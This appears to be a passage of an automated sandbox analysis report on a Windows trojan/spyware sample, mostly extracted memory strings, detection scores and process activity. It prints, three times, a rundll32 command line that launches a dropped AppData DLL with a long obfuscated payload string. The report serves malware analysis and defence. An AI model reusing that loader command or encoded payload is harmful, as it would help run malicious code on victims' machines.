                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NSC_NameNSC_AddressNSC_PhoneNSC_EmailNSC_DescriptionWM/WriterWM/ConductorWM/ProducerWM/DirectorWM/ContentGroupDescriptionWM/SubTitleWM/PartOfSetWM/ProtectionTypeWM/VideoHeightWM/VideoWidthWM/VideoFrameRateWM/MediaClassPrimaryIDWM/MediaClassSecondaryIDWM/PeriodWM/CategoryWM/PictureWM/Lyrics_SynchronisedWM/OriginalLyricistWM/OriginalArtistWM/OriginalAlbumTitleWM/OriginalReleaseYearWM/OriginalFilenameWM/PublisherWM/EncodedByWM/EncodingSettingsWM/EncodingTimeWM/AuthorURLWM/UserWebURLWM/AudioFileURLWM/AudioSourceURLWM/LanguageWM/ParentalRatingWM/BeatsPerMinuteWM/InitialKeyWM/MoodWM/TextWM/DVDIDWM/WMContentIDWM/WMCollectionIDWM/WMCollectionGroupIDWM/UniqueFileIdentifierWM/ModifiedByWM/RadioStationNameWM/RadioStationOwnerWM/PlaylistDelayWM/CodecWM/DRMWM/ISRCWM/ProviderWM/ProviderRatingWM/ProviderStyleWM/ContentDistributorWM/SubscriptionContentIDWM/WMADRCPeakReferenceWM/WMADRCPeakTargetWM/WMADRCAverageReferenceWM/WMADRCAverageTargetWM/StreamTypeInfoWM/PeakBitrateWM/ASFPacketCountWM/ASFSecurityObjectsSizeWM/SharedUserRatingWM/SubTitleDescriptionWM/MediaCreditsWM/ParentalRatingReasonWM/OriginalReleaseTimeWM/MediaStationCallSignWM/MediaStationNameWM/MediaNetworkAffiliationWM/MediaOriginalChannelWM/MediaIsStereoWM/MediaOriginalBroadcastDateTimeWM/VideoClosedCaptioningWM/MediaIsRepeatWM/MediaIsLiveWM/MediaIsTapeWM/MediaIsDelayWM/MediaIsSubtitledWM/MediaIsPremiereWM/MediaIsFinaleWM/MediaIsSAPWM/ProviderCopyrightWM/ISANWM/ADIDWM/WMShadowFileSourceFileTypeWM/WMShadowFileSourceDRMTypeWM/WMCPDistributorWM/WMCPDistributorIDWM/SeasonNumberWM/EpisodeNumberEarlyDataDeliveryJustInTimeDecodeSingleOutputBufferSoftwareScalingDeliverOnReceiveScrambledAudioDedicatedDeliveryThreadEnableDiscreteOutputSpeakerConfigDynamicRangeControlAllowInterlacedOutputVideoSampleDurationsStreamLanguageEnableWMAProSPDIFOutputDeinterlaceModeInterlacedCodingInitialPatternForInverseTelecineJPEGCompressionQualityWatermarkCLSIDWatermarkConfigFixedFrameRate_SOURCEFORMATTAG_ORIGINALWAVEFORMAT_EDL_COMPLEXITYEX_DECODERCOMPLEXITYPROFILEReloadIndexOnSeekStreamNumIndexObjectsFailSeekOnErrorPermitSeeksBeyondEndOfStreamUsePacketAtSeekPointSourceBufferTimeSourceMaxBytesAtOnce_VBRENABLED_VBRQUALITY_RMAX_BMAXVBR PeakBuffer Average_COMPLEXITYEXMAX_COMPLEXITYEXOFFLINE_COMPLEXITYEXLIVE_ISVBRSUPPORTED_PASSESUSEDMusicSpeechClassModeMusicClassModeSpeechClassModeMixedClassModeSpeechFormatCapPeakValueAverageLevelFold6To2Channels3Fold%luTo%luChannels%luDeviceConformanceTemplateEnableFrameInterpolationNeedsPreviousSampleWM/IsCompilation| vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKernelbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020D4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWin32u.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHELL32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.00000000023BB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020D6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempr.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemswsock.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315705538.0000000002137000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp_win.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLE32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.331563420.000000000212B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadvapi32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.334011206.000000000214A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEAUT32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.325224942.00000000023DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000024A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcrt.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320524869.0000000002113000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebcryptprimitives.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002750000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020DB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020D6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePROFAPI.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.334391183.0000000002110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamews2_32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerpcrt4.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOLEAUT32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHLWAPI.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWINMMbase.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.341846355.0000000002110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemswsock.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020F6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWINMM.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326882570.00000000022EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320596267.0000000002100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesechost.dllj% vs MqE1p1WFrf.exe
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll 438C088568093AD767802BA5E132EFBD4E643DDF62E4996565C3B46719E3E576
                      Source: MqE1p1WFrf.exeReversingLabs: Detection: 64%
                      Source: MqE1p1WFrf.exeVirustotal: Detection: 68%
                      Source: MqE1p1WFrf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\MqE1p1WFrf.exe C:\Users\user\Desktop\MqE1p1WFrf.exe
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 648
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0BJump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeFile created: C:\Users\user\AppData\Roaming\nsis_uns60877c.dllJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@0/1
                      Source: rundll32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: rundll32.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: rundll32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: rundll32.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: rundll32.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: rundll32.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
                      Source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-